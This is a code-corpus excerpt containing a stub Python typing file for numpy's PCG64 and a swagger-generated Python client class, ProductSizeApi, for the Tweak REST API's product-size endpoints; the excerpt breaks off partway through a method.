223818086e1736153ffe37499d2cded0a4b4514e | 45 | py | Python | data/typing/numpy.random._pcg64.py | vfdev-5/python-record-api | 006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b | ["MIT"] | 67 | 2020-08-17T11:53:26.000Z | 2021-11-08T20:16:06.000Z | data/typing/numpy.random._pcg64.py | vfdev-5/python-record-api | 006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b | ["MIT"] | 36 | 2020-08-17T11:09:51.000Z | 2021-12-15T18:09:47.000Z | data/typing/numpy.random._pcg64.py | pydata-apis/python-api-record | 684cffbbb6dc6e81f9de4e02619c8b0ebc557b2b | ["MIT"] | 7 | 2020-08-19T05:06:47.000Z | 2020-11-04T05:10:38.000Z |
from typing import *
class PCG64:
pass
| 7.5 | 20 | 0.666667 | 6 | 45 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0.288889 | 45 | 5 | 21 | 9 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
224a9d9e93611122a7f9d210d921ffa59f7873c1 | 174,352 | py | Python | TweakApi/apis/product_size_api.py | tweak-com-public/tweak-api-client-python | 019f86da11fdb12683d516f8f37db5d717380bcc | ["Apache-2.0"] | null | null | null | TweakApi/apis/product_size_api.py | tweak-com-public/tweak-api-client-python | 019f86da11fdb12683d516f8f37db5d717380bcc | ["Apache-2.0"] | null | null | null | TweakApi/apis/product_size_api.py | tweak-com-public/tweak-api-client-python | 019f86da11fdb12683d516f8f37db5d717380bcc | ["Apache-2.0"] | null | null | null |
# coding: utf-8
"""
tweak-api
Tweak API to integrate with all the Tweak services. You can find out more about Tweak at <a href='https://www.tweak.com'>https://www.tweak.com</a>, #tweak.
OpenAPI spec version: 1.0.8-beta.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ProductSizeApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def product_sizes_change_stream_get(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_change_stream_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_change_stream_get_with_http_info(**kwargs)
else:
(data) = self.product_sizes_change_stream_get_with_http_info(**kwargs)
return data
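    # Usage sketch (added comment; importing ApiClient from the package root
    # is an assumption -- the canonical path is TweakApi.api_client):
    #     api = ProductSizeApi(ApiClient())
    #     data = api.product_sizes_change_stream_get()        # synchronous
    #     def on_response(response):
    #         pprint(response)
    #     thread = api.product_sizes_change_stream_get(
    #         callback=on_response)                           # asynchronous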
def product_sizes_change_stream_get_with_http_info(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_change_stream_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['options']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_change_stream_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes/change-stream'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'options' in params:
query_params['options'] = params['options']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
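    # Every *_with_http_info method below repeats the template above: snapshot
    # the arguments with params = locals(), reject unknown keyword arguments
    # with a TypeError, map the survivors onto path/query/form/body
    # parameters, and delegate the request to self.api_client.call_api().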
def product_sizes_change_stream_post(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_change_stream_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_change_stream_post_with_http_info(**kwargs)
else:
(data) = self.product_sizes_change_stream_post_with_http_info(**kwargs)
return data
def product_sizes_change_stream_post_with_http_info(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_change_stream_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['options']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_change_stream_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes/change-stream'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'options' in params:
form_params.append(('options', params['options']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_count_get(self, **kwargs):
"""
Count instances of the model matched by where from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_count_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_count_get_with_http_info(**kwargs)
else:
(data) = self.product_sizes_count_get_with_http_info(**kwargs)
return data
def product_sizes_count_get_with_http_info(self, **kwargs):
"""
Count instances of the model matched by where from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_count_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_count_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes/count'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_find_one_get(self, **kwargs):
"""
Find first instance of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_find_one_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_find_one_get_with_http_info(**kwargs)
else:
(data) = self.product_sizes_find_one_get_with_http_info(**kwargs)
return data
def product_sizes_find_one_get_with_http_info(self, **kwargs):
"""
Find first instance of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_find_one_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_find_one_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes/findOne'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_get(self, **kwargs):
"""
Find all instances of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: list[ProductSize]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_get_with_http_info(**kwargs)
else:
(data) = self.product_sizes_get_with_http_info(**kwargs)
return data
def product_sizes_get_with_http_info(self, **kwargs):
"""
Find all instances of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: list[ProductSize]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ProductSize]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_delete(self, id, **kwargs):
"""
Delete a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_delete_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_delete_with_http_info(id, **kwargs)
return data
def product_sizes_id_delete_with_http_info(self, id, **kwargs):
"""
Delete a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_exists_get(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_exists_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_exists_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_exists_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_exists_get_with_http_info(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_exists_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_exists_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_exists_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/exists'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_get(self, id, **kwargs):
"""
Find a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_get_with_http_info(self, id, **kwargs):
"""
Find a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_head(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_head(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_head_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_head_with_http_info(id, **kwargs)
return data
def product_sizes_id_head_with_http_info(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_head_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_head" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_head`")
collection_formats = {}
resource_path = '/ProductSizes/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_count_get(self, id, **kwargs):
"""
Counts materials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_count_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_materials_count_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_materials_count_get_with_http_info(self, id, **kwargs):
"""
Counts materials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_count_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_materials_fk_delete_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_fk_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
